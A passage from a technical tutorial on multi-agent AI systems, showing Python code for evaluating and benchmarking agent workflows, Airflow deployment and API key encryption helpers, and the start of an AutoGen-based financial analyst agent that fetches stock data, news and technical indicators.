2681. Task Completion: Did the agents successfully complete the task?
2692. Efficiency: Was the workflow efficient, or were there unnecessary steps?
2703. Agent Collaboration: How well did the agents collaborate and share information?
2714. Agent Specialization: Did each agent contribute based on their expertise?
2725. Error Handling: How well were errors or uncertainties handled?
2736. Output Quality: How good is the final output?
274
275Format your response as a JSON object with the following structure:
276{
277 "workflow_evaluation": {
278 "task_completion": {
279 "score": X,
280 "comments": "Your assessment"
281 },
282 "efficiency": {
283 "score": X,
284 "comments": "Your assessment"
285 },
286 "agent_collaboration": {
287 "score": X,
288 "comments": "Your assessment"
289 },
290 "agent_specialization": {
291 "score": X,
292 "comments": "Your assessment"
293 },
294 "error_handling": {
295 "score": X,
296 "comments": "Your assessment"
297 },
298 "output_quality": {
299 "score": X,
300 "comments": "Your assessment"
301 }
302 },
303 "agent_contributions": [
304 {
305 "agent_name": "Agent name",
306 "contribution_quality": X,
307 "key_contributions": ["contribution1", "contribution2"]
308 },
309 ...
310 ],
311 "overall_score": X,
312 "improvement_suggestions": ["suggestion1", "suggestion2", ...],
313 "summary": "Overall workflow assessment"
314}
315"""
316
317 # Get evaluation from OpenAI
318 response = self.openai_client.chat.completions.create(
319 model="gpt-4-turbo",
320 messages=[
321 {"role": "system", "content": "You are an expert in multi-agent AI systems who evaluates workflows for efficiency and effectiveness."},
322 {"role": "user", "content": eval_prompt}
323 ],
324 response_format={"type": "json_object"},
325 temperature=0.3
326 )
327
328 # Parse the result
329 evaluation = json.loads(response.choices[0].message.content)
330
331 # Calculate metrics
332 scores = [
333 evaluation["workflow_evaluation"]["task_completion"]["score"],
334 evaluation["workflow_evaluation"]["efficiency"]["score"],
335 evaluation["workflow_evaluation"]["agent_collaboration"]["score"],
336 evaluation["workflow_evaluation"]["agent_specialization"]["score"],
337 evaluation["workflow_evaluation"]["error_handling"]["score"],
338 evaluation["workflow_evaluation"]["output_quality"]["score"]
339 ]
340
341 avg_score = sum(scores) / len(scores)
342
343 # Add calculated metrics
344 evaluation["metrics"] = {
345 "average_criteria_score": avg_score,
346 "interaction_count": len(agent_interactions),
347 "agent_count": len(set(interaction.get("agent_name", f"Agent {i}") for i, interaction in enumerate(agent_interactions))),
348 "output_length": len(final_output)
349 }
350
351 return evaluation
352
353 except Exception as e:
354 print(f"Error evaluating multi-agent workflow: {e}")
355 return {
356 "error": str(e),
357 "overall_score": 0,
358 "summary": f"Evaluation failed: {str(e)}"
359 }
360
361 def benchmark_agent(
362 self,
363 agent_function,
364 test_cases: List[Dict[str, Any]],
365 metrics: Optional[List[str]] = None
366 ) -> Dict[str, Any]:
367 """
368 Benchmark an agent against a set of test cases.
369
370 Args:
371 agent_function: Function that takes input and returns agent response
372 test_cases: List of test cases with input and expected output
373 metrics: Optional list of metrics to evaluate
374
375 Returns:
376 Dictionary with benchmark results
377 """
378 if metrics is None:
379 metrics = ["accuracy", "relevance", "completeness"]
380
381 results = []
382
383 for i, test_case in enumerate(test_cases):
384 case_id = test_case.get("id", f"case_{i}")
385 input_data = test_case.get("input", "")
386 expected_output = test_case.get("expected_output", None)
387
388 try:
389 # Run the agent
390 start_time = pd.Timestamp.now()
391 agent_output = agent_function(input_data)
392 end_time = pd.Timestamp.now()
393 duration = (end_time - start_time).total_seconds()
394
395 # Evaluate output
396 evaluation = self.evaluate_agent_output(
397 prompt=input_data,
398 response=agent_output,
399 ground_truth=expected_output,
400 criteria=metrics
401 )
402
403 # Compile results
404 case_result = {
405 "case_id": case_id,
406 "input": input_data,
407 "output": agent_output,
408 "expected_output": expected_output,
409 "execution_time": duration,
410 "evaluation": evaluation,
411 "overall_score": evaluation.get("overall_score", 0)
412 }
413
414 results.append(case_result)
415
416 except Exception as e:
417 print(f"Error in test case {case_id}: {e}")
418 results.append({
419 "case_id": case_id,
420 "input": input_data,
421 "error": str(e),
422 "overall_score": 0
423 })
424
425 # Aggregate results
426 overall_scores = [r.get("overall_score", 0) for r in results if "overall_score" in r]
427 avg_score = sum(overall_scores) / len(overall_scores) if overall_scores else 0
428
429 execution_times = [r.get("execution_time", 0) for r in results if "execution_time" in r]
430 avg_execution_time = sum(execution_times) / len(execution_times) if execution_times else 0
431
432 # Calculate per-metric averages
433 metric_scores = {}
434 for metric in metrics:
435 scores = []
436 for r in results:
437 if "evaluation" in r and "criteria_scores" in r["evaluation"]:
438 if metric in r["evaluation"]["criteria_scores"]:
439 scores.append(r["evaluation"]["criteria_scores"][metric].get("score", 0))
440
441 metric_scores[metric] = sum(scores) / len(scores) if scores else 0
442
443 return {
444 "benchmark_summary": {
445 "test_cases": len(test_cases),
446 "successful_cases": len([r for r in results if "error" not in r]),
447 "average_score": avg_score,
448 "average_execution_time": avg_execution_time,
449 "metric_averages": metric_scores
450 },
451 "case_results": results
452 }

Key Advantages:

  1. Enterprise Integration: Seamless integration with Snowflake for secure data storage and analytics
  2. Robust Scheduling: Airflow provides enterprise-grade task scheduling and dependency management
  3. Workflow Monitoring: Built-in monitoring and alerting for AI agent workflows
  4. Data Governance: Enterprise-grade data lineage and governance with Snowflake
  5. Experiment Tracking: MLflow integration for tracking agent performance and experiments

Production Considerations:

  1. Securing API Keys:

For production deployment, implement proper API key management:

python
1# api_key_management.py
2import os
3import base64
4import json
5from cryptography.fernet import Fernet
6from cryptography.hazmat.primitives import hashes
7from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
8from airflow.models import Variable
9from airflow.hooks.base import BaseHook
10
11class APIKeyManager:
12 """Securely manage API keys in Airflow."""
13
14 def __init__(self, master_key_env="MASTER_ENCRYPTION_KEY"):
15 """
16 Initialize the key manager.
17
18 Args:
19 master_key_env: Environment variable name for master key
20 """
21 # Get master key from environment
22 master_key = os.environ.get(master_key_env)
23 if not master_key:
24 raise ValueError(f"Master encryption key not found in environment variable {master_key_env}")
25
26 # Derive encryption key
27 kdf = PBKDF2HMAC(
28 algorithm=hashes.SHA256(),
29 length=32,
30 salt=b'airflow_api_key_manager',
31 iterations=100000,
32 )
33 key = base64.urlsafe_b64encode(kdf.derive(master_key.encode()))
34 self.cipher = Fernet(key)
35
36 def encrypt_key(self, api_key):
37 """Encrypt an API key."""
38 return self.cipher.encrypt(api_key.encode()).decode()
39
40 def decrypt_key(self, encrypted_key):
41 """Decrypt an API key."""
42 return self.cipher.decrypt(encrypted_key.encode()).decode()
43
44 def store_in_airflow(self, key_name, api_key):
45 """Store an encrypted API key in Airflow Variables."""
46 encrypted = self.encrypt_key(api_key)
47 Variable.set(key_name, encrypted)
48
49 def get_from_airflow(self, key_name):
50 """Get and decrypt an API key from Airflow Variables."""
51 encrypted = Variable.get(key_name)
52 return self.decrypt_key(encrypted)
53
54 def store_connection(self, conn_id, conn_type, host, login, password, port=None, extra=None):
55 """Store a connection in Airflow connections."""
56 # Encrypt sensitive parts
57 encrypted_password = self.encrypt_key(password)
58
59 # Create connection object
60 conn = BaseHook.get_connection(conn_id)
61 conn.conn_type = conn_type
62 conn.host = host
63 conn.login = login
64 conn.password = encrypted_password
65 conn.port = port
66
67 if extra:
68 # Encrypt extra fields if any
69 if isinstance(extra, dict):
70 encrypted_extra = {}
71 for k, v in extra.items():
72 encrypted_extra[k] = self.encrypt_key(v) if isinstance(v, str) else v
73 conn.extra = json.dumps(encrypted_extra)
74 else:
75 conn.extra = extra
76
77 # Save connection
78 conn.save()
  1. Parameter Management and Validation:
python
1# parameter_management.py
2from marshmallow import Schema, fields, validates, ValidationError
3from typing import Dict, Any
4
5class FinancialAnalysisSchema(Schema):
6 """Schema for validating financial analysis parameters."""
7 analysis_date = fields.Date(required=True)
8 stock_symbols = fields.List(fields.String(), required=True)
9 report_type = fields.String(required=True, validate=lambda x: x in ["standard", "detailed", "executive"])
10 include_sentiment = fields.Boolean(default=True)
11 market_context = fields.Boolean(default=True)
12 max_stocks = fields.Integer(default=10)
13
14 @validates("stock_symbols")
15 def validate_symbols(self, symbols):
16 """Validate stock symbols."""
17 if not symbols:
18 raise ValidationError("At least one stock symbol is required")
19
20 if len(symbols) > 20:
21 raise ValidationError("Maximum of 20 stock symbols allowed")
22
23 for symbol in symbols:
24 if not symbol.isalpha():
25 raise ValidationError(f"Invalid stock symbol: {symbol}")
26
27def validate_dag_params(params: Dict[str, Any], schema_class) -> Dict[str, Any]:
28 """
29 Validate DAG parameters using a schema.
30
31 Args:
32 params: Parameters to validate
33 schema_class: Schema class for validation
34
35 Returns:
36 Validated parameters
37
38 Raises:
39 ValueError: If validation fails
40 """
41 schema = schema_class()
42 try:
43 # Validate parameters
44 validated_params = schema.load(params)
45 return validated_params
46 except ValidationError as err:
47 error_messages = []
48 for field, messages in err.messages.items():
49 if isinstance(messages, list):
50 error_messages.append(f"{field}: {', '.join(messages)}")
51 else:
52 error_messages.append(f"{field}: {messages}")
53
54 error_str = "; ".join(error_messages)
55 raise ValueError(f"Parameter validation failed: {error_str}")
  1. Airflow Optimizations:

For production Airflow deployments, consider these optimizations:

python
1# airflow_config.py
2from airflow.models import Variable
3import subprocess
4import os
5
6# Recommended Airflow configuration optimizations
7def optimize_airflow_config():
8 """Apply optimizations to Airflow configuration."""
9 # Set environment variables
10 os.environ["AIRFLOW__CORE__MAX_ACTIVE_RUNS_PER_DAG"] = "1"
11 os.environ["AIRFLOW__CORE__PARALLELISM"] = "32"
12 os.environ["AIRFLOW__CORE__DAG_CONCURRENCY"] = "16"
13 os.environ["AIRFLOW__CORE__MAX_ACTIVE_TASKS_PER_DAG"] = "16"
14 os.environ["AIRFLOW__SCHEDULER__SCHEDULER_HEARTBEAT_SEC"] = "20"
15 os.environ["AIRFLOW__CORE__MIN_SERIALIZED_DAG_UPDATE_INTERVAL"] = "30"
16 os.environ["AIRFLOW__CORE__MIN_SERIALIZED_DAG_FETCH_INTERVAL"] = "30"
17 os.environ["AIRFLOW__CORE__STORE_DAG_CODE"] = "True"
18 os.environ["AIRFLOW__CORE__STORE_SERIALIZED_DAGS"] = "True"
19 os.environ["AIRFLOW__CORE__EXECUTE_TASKS_NEW_PYTHON_INTERPRETER"] = "True"
20
21 # Configure Celery executor settings
22 os.environ["AIRFLOW__CELERY__WORKER_AUTOSCALE"] = "8,2"
23 os.environ["AIRFLOW__CELERY__WORKER_PREFETCH_MULTIPLIER"] = "1"
24 os.environ["AIRFLOW__CELERY__TASK_POOL_LIMIT"] = "4"
25 os.environ["AIRFLOW__CELERY__OPERATION_TIMEOUT"] = "1800" # 30 minutes
26
27 # Logging optimizations
28 os.environ["AIRFLOW__LOGGING__REMOTE_LOGGING"] = "True"
29 os.environ["AIRFLOW__LOGGING__REMOTE_LOG_CONN_ID"] = "aws_default"
30 os.environ["AIRFLOW__LOGGING__REMOTE_BASE_LOG_FOLDER"] = "s3://airflow-logs-bucket/logs"
31
32 print("Applied Airflow optimizations")
33
34# Configure resource allocation for specific tasks
35def configure_task_resources(ti):
36 """Configure resources for specific tasks in the DAG."""
37 task_id = ti.task_id
38
39 # Configure based on task type
40 if "analysis" in task_id:
41 # Allocate more resources for analysis tasks
42 ti.executor_config = {
43 "KubernetesExecutor": {
44 "request_memory": "4Gi",
45 "request_cpu": "2",
46 "limit_memory": "8Gi",
47 "limit_cpu": "4"
48 }
49 }
50 elif "extract" in task_id:
51 # Database-heavy tasks
52 ti.executor_config = {
53 "KubernetesExecutor": {
54 "request_memory": "2Gi",
55 "request_cpu": "1",
56 "limit_memory": "4Gi",
57 "limit_cpu": "2"
58 }
59 }
60
61 return ti

This stack is particularly well-suited for organizations that need to:

  • Integrate AI agents with enterprise data platforms
  • Schedule complex AI agent workflows
  • Maintain compliance and governance
  • Track AI agent performance over time
  • Support data-intensive AI processes

4. AI Agent Templates for Real-World Applications

AI-Driven Financial Analyst (Market Data Analysis & Forecasting)

This AI agent template is designed to analyze financial market data, identify trends, and provide forecasting and investment recommendations. It combines market data analysis, sentiment evaluation from news sources, and technical analysis to generate comprehensive financial insights.

Core Capabilities:

  • Historical price analysis and pattern recognition
  • Sector and company fundamental analysis
  • News sentiment integration for market context
  • Technical indicator calculation and interpretation
  • Investment recommendation generation
  • Report creation with visualizations

Architecture:

Financial Analyst Agent Architecture

Implementation Example:

python
1# financial_analyst_agent.py
2import datetime
3import pandas as pd
4import numpy as np
5import matplotlib.pyplot as plt
6import seaborn as sns
7import yfinance as yf
8import autogen
9from autogen.agentchat.contrib.gpt_assistant_agent import GPTAssistantAgent
10import json
11import requests
12import os
13from typing import Dict, List, Any, Optional, Union, Tuple
14
15# Configure API keys and settings
16OPENAI_API_KEY = os.environ.get("OPENAI_API_KEY", "your-api-key")
17ALPHA_VANTAGE_API_KEY = os.environ.get("ALPHA_VANTAGE_API_KEY", "your-api-key")
18NEWS_API_KEY = os.environ.get("NEWS_API_KEY", "your-api-key")
19
20# Initialize OpenAI client
21import openai
22client = openai.OpenAI(api_key=OPENAI_API_KEY)
23
24class FinancialAnalystAgent:
25 """
26 An AI-driven financial analyst agent that provides comprehensive market analysis,
27 trend identification, and investment recommendations.
28 """
29
30 def __init__(self, config=None):
31 """
32 Initialize the Financial Analyst Agent.
33
34 Args:
35 config: Optional configuration dictionary
36 """
37 self.config = config or {}
38
39 # Set up agent configuration
40 self.llm_config = {
41 "config_list": [{"model": "gpt-4-turbo", "api_key": OPENAI_API_KEY}],
42 "temperature": 0.2,
43 "cache_seed": None # Disable caching for financial data which changes frequently
44 }
45
46 # Create the agent team
47 self._create_agent_team()
48
49 # Data cache
50 self.data_cache = {}
51
52 def _create_agent_team(self):
53 """Create the team of specialized agents for financial analysis."""
54
55 # 1. Market Analyst - Specialized in general market trends and sector analysis
56 self.market_analyst = autogen.AssistantAgent(
57 name="MarketAnalyst",
58 system_message="""You are an expert market analyst who specializes in understanding broad market trends,
59 sector rotations, and macroeconomic factors affecting financial markets.
60
61 Your responsibilities:
62 1. Analyze overall market conditions and trends
63 2. Identify sector strengths and weaknesses
64 3. Interpret macroeconomic data and its market impact
65 4. Provide context for market movements
66 5. Identify market sentiment and risk factors
67
68 Always base your analysis on data and established financial theories. Avoid speculation without evidence.
69 Present a balanced view that considers both bullish and bearish perspectives.""",
70 llm_config=self.llm_config
71 )
72
73 # 2. Technical Analyst - Specialized in chart patterns and technical indicators
74 self.technical_analyst = autogen.AssistantAgent(
75 name="TechnicalAnalyst",
76 system_message="""You are an expert technical analyst who specializes in chart patterns, technical indicators,
77 and price action analysis for financial markets.
78
79 Your responsibilities:
80 1. Analyze price charts for significant patterns
81 2. Calculate and interpret technical indicators
82 3. Identify support and resistance levels
83 4. Analyze volume patterns and their implications
84 5. Provide technical-based forecasts
85
86 Focus on objective technical analysis principles. Clearly explain the reasoning behind your analysis and
87 the historical reliability of the patterns you identify. Always consider multiple timeframes.""",
88 llm_config={
89 **self.llm_config,
90 "functions": [
91 {
92 "name": "calculate_technical_indicators",
93 "description": "Calculate technical indicators for a stock",
94 "parameters": {
95 "type": "object",
96 "properties": {
97 "symbol": {"type": "string", "description": "Stock symbol"},
98 "indicators": {"type": "array", "items": {"type": "string"}, "description": "List of indicators to calculate"},
99 "period": {"type": "string", "description": "Time period for analysis (e.g., '1y', '6mo', '3mo')"}
100 },
101 "required": ["symbol", "indicators"]
102 }
103 }
104 ]
105 }
106 )
107
108 # 3. Fundamental Analyst - Specialized in company financial data
109 self.fundamental_analyst = autogen.AssistantAgent(
110 name="FundamentalAnalyst",
111 system_message="""You are an expert fundamental analyst who specializes in analyzing company financial statements,
112 valuation metrics, and business models.
113
114 Your responsibilities:
115 1. Analyze company financial health and performance
116 2. Evaluate valuation metrics against industry peers
117 3. Assess growth prospects and business model strengths
118 4. Identify financial risks and opportunities
119 5. Provide fundamental-based investment recommendations
120
121 Always use established valuation methodologies and accounting principles. Compare companies to their
122 historical performance, sector peers, and the broader market. Consider both quantitative metrics
123 and qualitative factors.""",
124 llm_config=self.llm_config
125 )
126
127 # 4. News Sentiment Analyst - Specialized in news and social media sentiment
128 self.sentiment_analyst = autogen.AssistantAgent(
129 name="SentimentAnalyst",
130 system_message="""You are an expert in analyzing news and social media sentiment related to financial markets
131 and individual companies.
132
133 Your responsibilities:
134 1. Evaluate news sentiment affecting markets or specific stocks
135 2. Identify important news catalysts and their potential impact
136 3. Detect shifts in market narrative or sentiment
137 4. Assess information sources for reliability and importance
138 5. Contextualize news within broader market trends
139
140 Focus on objective analysis of sentiment. Distinguish between substantive news and market noise.
141 Consider the historical impact of similar news events and sentiment shifts.""",
142 llm_config=self.llm_config
143 )
144
145 # 5. Portfolio Advisor - Specialized in investment recommendations
146 self.portfolio_advisor = autogen.AssistantAgent(
147 name="PortfolioAdvisor",
148 system_message="""You are an expert investment advisor who specializes in portfolio construction,
149 risk management, and investment recommendations.
150
151 Your responsibilities:
152 1. Synthesize analyses from other specialists into actionable advice
153 2. Provide specific investment recommendations with rationales
154 3. Consider risk management and portfolio allocation
155 4. Present balanced bull/bear cases for investments
156 5. Contextualize recommendations for different investor profiles
157
158 Always include risk factors alongside potential rewards. Provide specific time horizons
159 for recommendations when possible. Consider multiple scenarios and their implications.
160 Make specific, actionable recommendations rather than general statements.""",
161 llm_config=self.llm_config
162 )
163
164 # 6. Report Writer - Specialized in creating comprehensive reports
165 self.report_writer = autogen.AssistantAgent(
166 name="ReportWriter",
167 system_message="""You are an expert financial report writer who specializes in synthesizing complex
168 financial analyses into clear, structured reports.
169
170 Your responsibilities:
171 1. Organize analyses into a coherent narrative
172 2. Create executive summaries that highlight key points
173 3. Structure information logically with appropriate sections
174 4. Maintain professional financial writing standards
175 5. Ensure reports are comprehensive yet accessible
176
177 Use clear financial terminology and explain complex concepts when necessary. Include all relevant
178 information while avoiding unnecessary repetition. Organize content with appropriate headings
179 and structure. Always include an executive summary and conclusion.""",
180 llm_config=self.llm_config
181 )
182
183 # User proxy agent for orchestrating the workflow
184 self.user_proxy = autogen.UserProxyAgent(
185 name="FinancialDataManager",
186 human_input_mode="NEVER",
187 code_execution_config={
188 "work_dir": "financial_analysis_workspace",
189 "use_docker": False,
190 "last_n_messages": 3
191 },
192 system_message="""You are a financial data manager that coordinates the financial analysis process.
193 Your role is to gather data, distribute it to the specialized analysts, and compile their insights.
194 You can execute Python code to fetch and process financial data."""
195 )
196
197 def fetch_market_data(self, symbols: List[str], period: str = "1y") -> Dict[str, pd.DataFrame]:
198 """
199 Fetch market data for specified symbols.
200
201 Args:
202 symbols: List of stock symbols
203 period: Time period for data (e.g., '1d', '5d', '1mo', '3mo', '6mo', '1y', '2y', '5y', '10y', 'ytd', 'max')
204
205 Returns:
206 Dictionary of DataFrames with market data
207 """
208 results = {}
209
210 # Check cache first
211 cache_key = f"{','.join(symbols)}_{period}"
212 if cache_key in self.data_cache:
213 return self.data_cache[cache_key]
214
215 # Fetch data for each symbol
216 for symbol in symbols:
217 try:
218 stock = yf.Ticker(symbol)
219 hist = stock.history(period=period)
220
221 if not hist.empty:
222 results[symbol] = hist
223
224 # Calculate returns
225 hist['Daily_Return'] = hist['Close'].pct_change()
226 hist['Cumulative_Return'] = (1 + hist['Daily_Return']).cumprod() - 1
227
228 # Calculate volatility (20-day rolling standard deviation of returns)
229 hist['Volatility_20d'] = hist['Daily_Return'].rolling(window=20).std()
230
231 # Add some basic technical indicators
232 # 20-day and 50-day moving averages
233 hist['MA20'] = hist['Close'].rolling(window=20).mean()
234 hist['MA50'] = hist['Close'].rolling(window=50).mean()
235
236 # Relative Strength Index (RSI)
237 delta = hist['Close'].diff()
238 gain = (delta.where(delta > 0, 0)).rolling(window=14).mean()
239 loss = (-delta.where(delta < 0, 0)).rolling(window=14).mean()
240 rs = gain / loss
241 hist['RSI'] = 100 - (100 / (1 + rs))
242
243 results[symbol] = hist
244 except Exception as e:
245 print(f"Error fetching data for {symbol}: {e}")
246
247 # Store in cache
248 self.data_cache[cache_key] = results
249
250 return results
251
252 def fetch_fundamental_data(self, symbols: List[str]) -> Dict[str, Dict[str, Any]]:
253 """
254 Fetch fundamental data for specified symbols.
255
256 Args:
257 symbols: List of stock symbols
258
259 Returns:
260 Dictionary of fundamental data by symbol
261 """
262 results = {}
263
264 for symbol in symbols:
265 try:
266 stock = yf.Ticker(symbol)
267
268 # Get key statistics
269 info = stock.info
270
271 # Get financial data
272 try:
273 income_stmt = stock.income_stmt
274 balance_sheet = stock.balance_sheet
275 cash_flow = stock.cashflow
276
277 financials = {
278 "income_statement": income_stmt.to_dict() if not income_stmt.empty else {},
279 "balance_sheet": balance_sheet.to_dict() if not balance_sheet.empty else {},
280 "cash_flow": cash_flow.to_dict() if not cash_flow.empty else {}
281 }
282 except:
283 financials = {}
284
285 # Compile results
286 results[symbol] = {
287 "info": info,
288 "financials": financials
289 }
290 except Exception as e:
291 print(f"Error fetching fundamental data for {symbol}: {e}")
292
293 return results
294
295 def fetch_news_data(self, symbols: List[str], days: int = 7) -> Dict[str, List[Dict[str, Any]]]:
296 """
297 Fetch news articles for specified symbols.
298
299 Args:
300 symbols: List of stock symbols
301 days: Number of days to look back
302
303 Returns:
304 Dictionary of news articles by symbol
305 """
306 results = {}
307
308 for symbol in symbols:
309 try:
310 # Format date range
311 end_date = datetime.datetime.now()
312 start_date = end_date - datetime.timedelta(days=days)
313
314 # Get company name for better search results
315 company_name = ""
316 try:
317 stock = yf.Ticker(symbol)
318 company_name = stock.info.get("shortName", symbol)
319 except:
320 company_name = symbol
321
322 # Construct query
323 query = f"{company_name} OR {symbol} stock"
324
325 # Fetch news from NewsAPI
326 url = (f"https://newsapi.org/v2/everything?"
327 f"q={query}&"
328 f"from={start_date.strftime('%Y-%m-%d')}&"
329 f"to={end_date.strftime('%Y-%m-%d')}&"
330 f"language=en&"
331 f"sortBy=relevancy&"
332 f"pageSize=10&"
333 f"apiKey={NEWS_API_KEY}")
334
335 response = requests.get(url)
336 if response.status_code == 200:
337 news_data = response.json()
338 articles = news_data.get("articles", [])
339
340 # Process articles
341 processed_articles = []
342 for article in articles:
343 processed_articles.append({
344 "title": article.get("title", ""),
345 "source": article.get("source", {}).get("name", ""),
346 "published_at": article.get("publishedAt", ""),
347 "url": article.get("url", ""),
348 "description": article.get("description", "")
349 })
350
351 results[symbol] = processed_articles
352 else:
353 print(f"Error fetching news for {symbol}: {response.status_code}")
354 results[symbol] = []
355 except Exception as e:
356 print(f"Error fetching news for {symbol}: {e}")
357 results[symbol] = []
358
359 return results
360
361 def calculate_technical_indicators(self, symbol: str, indicators: List[str], period: str = "1y") -> Dict[str, Any]:
362 """
363 Calculate technical indicators for a stock.
364
365 Args:
366 symbol: Stock symbol
367 indicators: List of indicators to calculate
368 period: Time period for data
369
370 Returns:
371 Dictionary of technical indicators
372 """
373 try:
374 # Fetch data
375 data = self.fetch_market_data([symbol], period).get(symbol)
376 if data is None or data.empty:
377 return {"error": f"No data available for {symbol}"}
378
379 results = {}
380
381 for indicator in indicators:
382 indicator = indicator.lower()
383
384 # Moving Averages
385 if indicator.startswith("ma") or indicator.startswith("sma"):
386 try:
387 # Extract window size from indicator name (e.g., "ma20" -> 20)
388 window = int(indicator[2:]) if indicator.startswith("ma") else int(indicator[3:])
389 data[f'MA{window}'] = data['Close'].rolling(window=window).mean()
390 # Get the most recent value
391 latest_value = data[f'MA{window}'].iloc[-1]
392 results[f'MA{window}'] = latest_value
393 except:
394 results[f'{indicator}'] = None
395
396 # Exponential Moving Average
397 elif indicator.startswith("ema"):
398 try:
399 window = int(indicator[3:])
400 data[f'EMA{window}'] = data['Close'].ewm(span=window, adjust=False).mean()
401 latest_value = data[f'EMA{window}'].iloc[-1]
402 results[f'EMA{window}'] = latest_value
403 except:
404 results[f'{indicator}'] = None
405
406 # RSI - Relative Strength Index
407 elif indicator == "rsi":
408 try:
409 delta = data['Close'].diff()
410 gain = (delta.where(delta > 0, 0)).rolling(window=14).mean()
411 loss = (-delta.where(delta < 0, 0)).rolling(window=14).mean()
412 rs = gain / loss
413 data['RSI'] = 100 - (100 / (1 + rs))
414 latest_value = data['RSI'].iloc[-1]
415 results['RSI'] = latest_value
416 except:
417 results['RSI'] = None
418
419 # MACD - Moving Average Convergence Divergence
420 elif indicator == "macd":
421 try:
422 exp1 = data['Close'].ewm(span=12, adjust=False).mean()
423 exp2 = data['Close'].ewm(span=26, adjust=False).mean()
424 data['MACD'] = exp1 - exp2
425 data['Signal_Line'] = data['MACD'].ewm(span=9, adjust=False).mean()
426 data['MACD_Histogram'] = data['MACD'] - data['Signal_Line']
427
428 results['MACD'] = {
429 'MACD_Line': data['MACD'].iloc[-1],
430 'Signal_Line': data['Signal_Line'].iloc[-1],
431 'Histogram': data['MACD_Histogram'].iloc[-1]
432 }
433 except:
434 results['MACD'] = None
435
436 # Bollinger Bands
437 elif indicator == "bollinger" or indicator == "bb":
438 try:
439 window = 20
440 data['MA20'] = data['Close'].rolling(window=window).mean()
441 data['BB_Upper'] = data['MA20'] + (data['Close'].rolling(window=window).std() * 2)
442 data['BB_Lower'] = data['MA20'] - (data['Close'].rolling(window=window).std() * 2)
443
444 results['Bollinger_Bands'] = {
445 'Upper': data['BB_Upper'].iloc[-1],
446 'Middle': data['MA20'].iloc[-1],
447 'Lower': data['BB_Lower'].iloc[-1],
448 'Width': (data['BB_Upper'].iloc[-1] - data['BB_Lower'].iloc[-1]) / data['MA20'].iloc[-1]
449 }
450 except:
451 results['Bollinger_Bands'] = None
452
453 # Average True Range (ATR)
454 elif indicator == "atr":
455 try:
456 high_low = data['High'] - data['Low']
457 high_close = (data['High'] - data['Close'].shift()).abs()
458 low_close = (data['Low'] - data['Close'].shift()).abs()
459 ranges = pd.concat([high_low, high_close, low_close], axis=1)
460 true_range = ranges.max(axis=1)
461 data['ATR'] = true_range.rolling(14).mean()
462 latest_value = data['ATR'].iloc[-1]
463 results['ATR'] = latest_value
464 except:
465 results['ATR'] = None
466
467 # Volume-Weighted Average Price (VWAP)
468 elif indicator == "vwap":
469 try:
470 typical_price = (data['High'] + data['Low'] + data['Close']) / 3
471 data['VWAP'] = (typical_price * data['Volume']).cumsum() / data['Volume'].cumsum()
472 latest_value = data['VWAP'].iloc[-1]
473 results['VWAP'] = latest_value
474 except:
475 results['VWAP'] = None
476
477 # Add the current price for reference
478 results['Current_Price'] = data['Close'].iloc[-1]
479
480 return results
481
482 except Exception as e:
483 return {"error": str(e)}
484
485 def analyze_stock(
486 self,
487 symbol: str,
488 period: str = "1y",
489 include_news: bool = True,
490 include_fundamentals: bool = True,
491 report_type: str = "standard"
492 ) -> Dict[str, Any]:
493 """
494 Perform a comprehensive analysis of a stock.
495
496 Args:
497 symbol: Stock symbol to analyze
498 period: Time period for analysis
499 include_news: Whether to include news analysis
500 include_fundamentals: Whether to include fundamental analysis
501 report_type: Type of report (standard, detailed, executive)
502
503 Returns:
504 Dictionary with comprehensive analysis
505 """
506 # Gather data
507 market_data = self.fetch_market_data([symbol], period)
508
509 # Create group chat for agent collaboration
510 groupchat = autogen.GroupChat(
511 agents=[
512 self.user_proxy,
513 self.market_analyst,
514 self.technical_analyst,
515 self.fundamental_analyst,
516 self.sentiment_analyst,
517 self.portfolio_advisor,
518 self.report_writer
519 ],
520 messages=[],
521 max_round=12
522 )
523
524 manager = autogen.GroupChatManager(groupchat=groupchat)
525
526 # Prepare market data for agents
527 if symbol in market_data:
528 df = market_data[symbol]
529
530 # Create price summary
531 price_start = df['Close'].iloc[0]
532 price_end = df['Close'].iloc[-1]
533 price_change = price_end - price_start
534 price_change_pct = (price_change / price_start) * 100
535 price_high = df['High'].max()
536 price_low = df['Low'].min()
537
538 price_summary = f"""
539 Stock: {symbol}
540 Period: {period}
541 Starting Price: ${price_start:.2f}
542 Current Price: ${price_end:.2f}
543 Price Change: ${price_change:.2f} ({price_change_pct:.2f}%)
544 Period High: ${price_high:.2f}
545 Period Low: ${price_low:.2f}
546 Trading Volume (Avg): {df['Volume'].mean():.0f}
547 """
548
549 # Calculate key technical indicators
550 tech_indicators = self.calculate_technical_indicators(
551 symbol,
552 ["ma20", "ma50", "ma200", "rsi", "macd", "bollinger"],
553 period
554 )
555
556 # Convert indicators to string format
557 indicators_str = json.dumps(tech_indicators, indent=2)
558
559 # Get fundamental data if requested
560 fundamentals_str = ""
561 if include_fundamentals:
562 fundamental_data = self.fetch_fundamental_data([symbol])
563 if symbol in fundamental_data:
564 # Extract key metrics
565 info = fundamental_data[symbol].get("info", {})
566 fundamentals_str = f"""
567 Market Cap: {info.get('marketCap', 'N/A')}
568 P/E Ratio: {info.get('trailingPE', 'N/A')}
569 EPS: {info.get('trailingEps', 'N/A')}
570 Beta: {info.get('beta', 'N/A')}
571 52 Week High: {info.get('fiftyTwoWeekHigh', 'N/A')}
572 52 Week Low: {info.get('fiftyTwoWeekLow', 'N/A')}
573 Dividend Yield: {info.get('dividendYield', 'N/A')}
574 Industry: {info.get('industry', 'N/A')}
575 Sector: {info.get('sector', 'N/A')}
576 """
577
578 # Get news data if requested
579 news_str = ""
580 if include_news:
581 news_data = self.fetch_news_data([symbol], days=15)
582 if symbol in news_data and news_data[symbol]:
583 news_str = "Recent News:\n"
584 for i, article in enumerate(news_data[symbol][:5], 1):
585 news_str += f"""
586 {i}. {article.get('title', 'N/A')}
587 Source: {article.get('source', 'N/A')}
588 Date: {article.get('published_at', 'N/A')}
589 Summary: {article.get('description', 'N/A')}
590 """
591
592 # Generate initial prompt for the agent team
593 analysis_prompt = f"""
594 Please analyze the following stock: {symbol}
595
596 TIME PERIOD: {period}
597
598 PRICE SUMMARY:
599 {price_summary}
600
601 TECHNICAL INDICATORS:
602 {indicators_str}
603 """
604
605 if fundamentals_str:
606 analysis_prompt += f"""
607 FUNDAMENTAL DATA:
608 {fundamentals_str}
609 """
610
611 if news_str:
612 analysis_prompt += f"""
613 NEWS:
614 {news_str}
615 """
616
617 analysis_prompt += f"""
618 Please provide a {report_type} analysis report that includes:
